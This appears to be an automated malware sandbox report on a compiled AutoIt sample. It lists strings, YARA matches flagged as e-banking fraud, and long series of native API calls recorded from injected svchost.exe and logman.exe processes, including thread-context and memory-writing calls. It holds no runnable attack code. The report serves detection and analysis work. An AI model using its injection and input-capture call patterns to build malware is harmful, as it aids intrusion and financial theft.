                Source: logman.exe, 00000005.00000002.4505185726.00000000047B4000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004194000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: logman.exe, 00000005.00000003.2600123925.00000000078CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C84164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00C84164
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C84164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00C84164
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C83F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00C83F66
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C7001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00C7001C
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C9CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00C9CABC

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.4504489847.0000000002D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4506381463.0000000005550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4503536884.0000000002730000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4503787893.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2417007133.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2417341861.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4504631608.0000000004530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2417817350.0000000005400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: This is a third-party compiled AutoIt script.0_2_00C13B3A
                Source: NWPZbNcRxL.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: NWPZbNcRxL.exe, 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_40502ed8-6
                Source: NWPZbNcRxL.exe, 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_8eb8d10c-6
                Source: NWPZbNcRxL.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_eef076e4-4
                Source: NWPZbNcRxL.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_09251231-3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C663 NtClose,2_2_0042C663
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040AA54 NtDelayExecution,2_2_0040AA54
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972B60 NtClose,LdrInitializeThunk,2_2_03972B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03972DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039735C0 NtCreateMutant,LdrInitializeThunk,2_2_039735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03974340 NtSetContextThread,2_2_03974340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03974650 NtSuspendThread,2_2_03974650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972B80 NtQueryInformationFile,2_2_03972B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972BA0 NtEnumerateValueKey,2_2_03972BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972BF0 NtAllocateVirtualMemory,2_2_03972BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972BE0 NtQueryValueKey,2_2_03972BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972AB0 NtWaitForSingleObject,2_2_03972AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972AD0 NtReadFile,2_2_03972AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972AF0 NtWriteFile,2_2_03972AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972F90 NtProtectVirtualMemory,2_2_03972F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972FB0 NtResumeThread,2_2_03972FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972FA0 NtQuerySection,2_2_03972FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972FE0 NtCreateFile,2_2_03972FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972F30 NtCreateSection,2_2_03972F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972F60 NtCreateProcessEx,2_2_03972F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972E80 NtReadVirtualMemory,2_2_03972E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972EA0 NtAdjustPrivilegesToken,2_2_03972EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972EE0 NtQueueApcThread,2_2_03972EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972E30 NtWriteVirtualMemory,2_2_03972E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972DB0 NtEnumerateKey,2_2_03972DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972DD0 NtDelayExecution,2_2_03972DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972D10 NtMapViewOfSection,2_2_03972D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972D00 NtSetInformationFile,2_2_03972D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972D30 NtUnmapViewOfSection,2_2_03972D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972CA0 NtQueryInformationToken,2_2_03972CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972CC0 NtQueryVirtualMemory,2_2_03972CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972CF0 NtOpenProcess,2_2_03972CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972C00 NtQueryInformationProcess,2_2_03972C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972C70 NtFreeVirtualMemory,2_2_03972C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972C60 NtCreateKey,2_2_03972C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03973090 NtSetValueKey,2_2_03973090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03973010 NtOpenDirectoryObject,2_2_03973010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039739B0 NtGetContextThread,2_2_039739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03973D10 NtOpenProcessToken,2_2_03973D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03973D70 NtOpenThread,2_2_03973D70
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_03184340 NtSetContextThread,LdrInitializeThunk,5_2_03184340
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_03184650 NtSuspendThread,LdrInitializeThunk,5_2_03184650
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_03182B60 NtClose,LdrInitializeThunk,5_2_03182B60
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_03182BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_03182BA0
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_03182BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_03182BF0
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_03182BE0 NtQueryValueKey,LdrInitializeThunk,5_2_03182BE0
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_03182AD0 NtReadFile,LdrInitializeThunk,5_2_03182AD0
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_03182AF0 NtWriteFile,LdrInitializeThunk,5_2_03182AF0
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_03182F30 NtCreateSection,LdrInitializeThunk,5_2_03182F30
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_03182FB0 NtResumeThread,LdrInitializeThunk,5_2_03182FB0
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_03182FE0 NtCreateFile,LdrInitializeThunk,5_2_03182FE0
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_03182E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_03182E80
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_03182EE0 NtQueueApcThread,LdrInitializeThunk,5_2_03182EE0
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_03182D10 NtMapViewOfSection,LdrInitializeThunk,5_2_03182D10
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_03182D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_03182D30
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_03182DD0 NtDelayExecution,LdrInitializeThunk,5_2_03182DD0
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_03182DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_03182DF0
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_03182C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_03182C70
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_03182C60 NtCreateKey,LdrInitializeThunk,5_2_03182C60
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_03182CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_03182CA0
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_031835C0 NtCreateMutant,LdrInitializeThunk,5_2_031835C0
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_031839B0 NtGetContextThread,LdrInitializeThunk,5_2_031839B0
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_03182B80 NtQueryInformationFile,5_2_03182B80
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_03182AB0 NtWaitForSingleObject,5_2_03182AB0
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_03182F60 NtCreateProcessEx,5_2_03182F60
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_03182F90 NtProtectVirtualMemory,5_2_03182F90
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_03182FA0 NtQuerySection,5_2_03182FA0
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_03182E30 NtWriteVirtualMemory,5_2_03182E30
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_03182EA0 NtAdjustPrivilegesToken,5_2_03182EA0
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_03182D00 NtSetInformationFile,5_2_03182D00
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_03182DB0 NtEnumerateKey,5_2_03182DB0
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_03182C00 NtQueryInformationProcess,5_2_03182C00
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_03182CC0 NtQueryVirtualMemory,5_2_03182CC0
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_03182CF0 NtOpenProcess,5_2_03182CF0
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_03183010 NtOpenDirectoryObject,5_2_03183010
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_03183090 NtSetValueKey,5_2_03183090
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_03183D10 NtOpenProcessToken,5_2_03183D10
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_03183D70 NtOpenThread,5_2_03183D70
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_02759340 NtReadFile,5_2_02759340
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_027591D0 NtCreateFile,5_2_027591D0
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_02759630 NtAllocateVirtualMemory,5_2_02759630
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_02759430 NtDeleteFile,5_2_02759430
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_027594D0 NtClose,5_2_027594D0
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_02F6F2EB NtReadVirtualMemory,5_2_02F6F2EB
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C7A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00C7A1EF
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C68310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00C68310
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C751BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00C751BD
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C3D9750_2_00C3D975
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C321C50_2_00C321C5
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C462D20_2_00C462D2
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C903DA0_2_00C903DA
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C4242E0_2_00C4242E
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C325FA0_2_00C325FA
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C266E10_2_00C266E1
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C1E6A00_2_00C1E6A0
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C6E6160_2_00C6E616
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C4878F0_2_00C4878F
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C788890_2_00C78889
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C468440_2_00C46844
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C908570_2_00C90857
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C288080_2_00C28808
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C3CB210_2_00C3CB21
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C46DB60_2_00C46DB6
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C26F9E0_2_00C26F9E
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C230300_2_00C23030
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C3F1D90_2_00C3F1D9
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C331870_2_00C33187
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C112870_2_00C11287
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C314840_2_00C31484
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C255200_2_00C25520
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C376960_2_00C37696
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C257600_2_00C25760
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C319780_2_00C31978
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C49AB50_2_00C49AB5
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C1FCE00_2_00C1FCE0
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C97DDB0_2_00C97DDB
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C31D900_2_00C31D90
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C3BDA60_2_00C3BDA6
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C23FE00_2_00C23FE0
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C1DF000_2_00C1DF00
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_010285E00_2_010285E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004185B32_2_004185B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E0132_2_0040E013
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004100232_2_00410023
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E1572_2_0040E157
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E1632_2_0040E163
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402A502_2_00402A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004012102_2_00401210
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401C202_2_00401C20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042EC932_2_0042EC93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FDFB2_2_0040FDFB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FE032_2_0040FE03
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402F102_2_00402F10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004167B32_2_004167B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004167B22_2_004167B2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A003E62_2_03A003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E3F02_2_0394E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FA3522_2_039FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C02C02_2_039C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E02742_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A001AA2_2_03A001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F41A22_2_039F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F81CC2_2_039F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA1182_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039301002_2_03930100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C81582_2_039C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D20002_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393C7C02_2_0393C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039647502_2_03964750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039407702_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395C6E02_2_0395C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A005912_2_03A00591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039405352_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EE4F62_2_039EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E44202_2_039E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F24462_2_039F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F6BD72_2_039F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FAB402_2_039FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA802_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A0A9A62_2_03A0A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A02_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039569622_2_03956962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039268B82_2_039268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E8F02_2_0396E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394A8402_2_0394A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039428402_2_03942840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BEFA02_2_039BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932FC82_2_03932FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394CFE02_2_0394CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03960F302_2_03960F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E2F302_2_039E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03982F282_2_03982F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B4F402_2_039B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952E902_2_03952E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FCE932_2_039FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FEEDB2_2_039FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393AE0D2_2_0393AE0D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FEE262_2_039FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940E592_2_03940E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03958DBF2_2_03958DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DCD1F2_2_039DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394AD002_2_0394AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0CB52_2_039E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930CF22_2_03930CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940C002_2_03940C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0398739A2_2_0398739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F132D2_2_039F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392D34C2_2_0392D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039452A02_2_039452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395B2C02_2_0395B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E12ED2_2_039E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394B1B02_2_0394B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A0B16B2_2_03A0B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392F1722_2_0392F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397516C2_2_0397516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EF0CC2_2_039EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039470C02_2_039470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F70E92_2_039F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FF0E02_2_039FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FF7B02_2_039FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F16CC2_2_039F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039856302_2_03985630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DD5B02_2_039DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A095C32_2_03A095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F75712_2_039F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FF43F2_2_039FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039314602_2_03931460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395FB802_2_0395FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B5BF02_2_039B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397DBF92_2_0397DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFB762_2_039FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DDAAC2_2_039DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03985AA02_2_03985AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E1AA32_2_039E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EDAC62_2_039EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFA492_2_039FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F7A462_2_039F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B3A6C2_2_039B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D59102_2_039D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039499502_2_03949950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395B9502_2_0395B950
